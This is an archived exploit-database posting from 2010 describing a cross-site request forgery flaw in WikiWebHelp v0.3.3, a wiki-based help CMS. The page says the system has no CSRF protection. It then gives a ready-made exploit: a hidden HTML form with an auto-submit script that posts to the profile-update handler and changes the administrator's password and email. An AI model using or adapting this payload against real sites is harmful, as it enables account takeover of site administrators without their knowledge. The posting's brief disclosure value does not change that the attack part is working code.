[webapps / 0day] - WikiWebHelp v0.3.3 Cross-Site Request For
Posted on 12 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability by Yoyahack in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=========================================================== WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability =========================================================== #Blog: yoyahack.blogspot.com #Site: foro.undersecurity.net #Mail: yoyahack@undersecurity.net #CMS: WikiWebHelp The entire system is vulnerable to CSRF (Cross-site request forgery) since this does not include a system to prevent CSRF attacks ... Example Change the password of users, including the administrator. Exploit: <form name="CSRF" method="post" action=" http://127.0.0.1/wwh/handlers/updateprofile.php?id=1"> <input type='hidden' name='pass' value='password'> <input type='hidden' name='confirm' value='confirm_password'> <input type='hidden' name='email' value='email'> <input type='hidden' name='sub' value='on'> <input type='hidden' name='id' value='1'> <input type='hidden' name='subscribe' value='true'> <script>document.CSRF.submit()</script> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-12]</pre></body></html>